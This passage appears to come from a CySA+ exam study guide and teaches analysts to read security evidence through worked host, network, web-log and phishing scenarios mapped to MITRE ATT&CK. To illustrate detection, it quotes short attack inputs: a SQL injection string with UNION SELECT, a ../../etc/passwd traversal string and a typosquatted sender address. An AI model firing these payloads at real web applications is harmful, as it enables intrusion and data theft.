2.3 Scenario Practice for Security Operations

2.3 Scenario Practice for Security Operations

Scenario questions are where CySA+ separates analysts who memorized terms from those who can read evidence. Use a six-step read: identify the data source, establish the baseline, isolate the deviation, map it to a MITRE ATT&CK technique, choose the next analytic action, and predict what confirms it.

Map behavior to MITRE ATT&CK

The MITRE ATT&CK framework organizes adversary behavior into tactics (the why — e.g., Initial Access, Execution, Persistence, Defense Evasion, Command and Control, Exfiltration) and techniques (the how, with IDs like T1059). Learn the high-frequency techniques:

Worked scenario: host indicator

A process named svchost.exe runs from C:\Users\Public\ instead of C:\Windows\System32\. The legitimate name with the wrong path is masquerading (T1036) — a defense-evasion technique. Your next step is not to kill it blindly; it is to capture the process tree, hash, and parent (memory and EDR data) before containment, so you preserve evidence and learn how it launched.

Worked scenario: fileless / living-off-the-land

A server shows regular outbound HTTPS at fixed intervals, consistent payload sizes, to recently registered domains, with no unusual process in memory but a scheduled task calling PowerShell. This is fileless malware using living-off-the-land (LOTL) binaries: it abuses trusted, signed tools (PowerShell, WMI, scheduled tasks) and runs in memory, leaving no traditional file artifact. Signature-based antivirus misses it; detection depends on behavioral analysis — beacon regularity, domain age, and command-line auditing (Event ID 4688).

Worked scenario: network indicator

NetFlow shows one internal host opening hundreds of short-lived TCP connections to sequential ports on many internal hosts over a few minutes. The baseline is that workstations talk to servers, not to every peer on every port. The deviation is the fan-out pattern. The hypothesis is internal network scanning / discovery (T1046), often a sign of post-compromise lateral movement reconnaissance. The next step is to identify the scanning host, check its recent authentication and process activity, and determine whether it is an attacker-controlled box or an authorized vulnerability scan.

The discipline is the same every time: data source, baseline, deviation, technique, action.

Deception as a detection source

Decoy credentials, files, or systems are deception technology. A honeypot is a single decoy host; a honeynet is a network of decoy hosts that lets defenders watch a full attack unfold; honeytokens are fake credentials, files, or database records that should never be touched in normal operations. Any access to bait is high-fidelity evidence of an intruder because legitimate users have no reason to interact with it. These controls dramatically reduce false positives — the only people poking at decoys are attackers or careless insiders — and they buy defenders time and intelligence about attacker tooling.

When a stem says "all of the above" includes honeypot, honeynet, and decoy files, the umbrella term that covers them is deception technology.

Reading order under exam time

Scenario items are dense, so read the last sentence first to learn what is being asked, then mine the body for the one or two artifacts that decide the answer. Do not let a long backstory distract you; the cue is usually a single value — a path, a port, an event ID, a domain age, or a parent process. Mark and skip a PBQ that is eating your clock, since every item is weighted and a stalled performance question can cost you several straightforward multiple-choice points elsewhere.

Worked scenario: application indicator

A web server log shows a request such as GET /products?id=1' OR '1'='1 returning an unusually large response, followed by requests containing UNION SELECT. The data source is the web/application log; the baseline is parameter values that are numeric IDs; the deviation is SQL syntax injected into the parameter; the hypothesis is SQL injection (SQLi) attempting to read the database.

Adjacent application indicators to recognize on sight include <script> payloads (cross-site scripting, XSS), ../../etc/passwd (directory/path traversal), encoded shell commands in a parameter (command injection), and abnormally high request rates from one client (credential stuffing or scraping). The next analytic step is to confirm whether the injection succeeded (response size, error messages, data returned), check whether a web application firewall (WAF) blocked it, and review the database logs for the executed query.

Worked scenario: social-engineering indicator

Objective 1.2 also covers human-layer attacks. A stem describing an email from support@micros0ft-secure.com urging an immediate password reset, with a link to a look-alike domain, is phishing (T1566) leveraging typosquatting and urgency. A targeted version aimed at an executive is whaling; a phone-based version is vishing; a text-based version is smishing. The analyst indicators are header anomalies (SPF/DKIM/DMARC failures), display-name spoofing, and recently registered look-alike domains.

The next step is to pull the message headers, check whether other recipients received it (a campaign), block the sender and domain, and report it through the phishing-response playbook.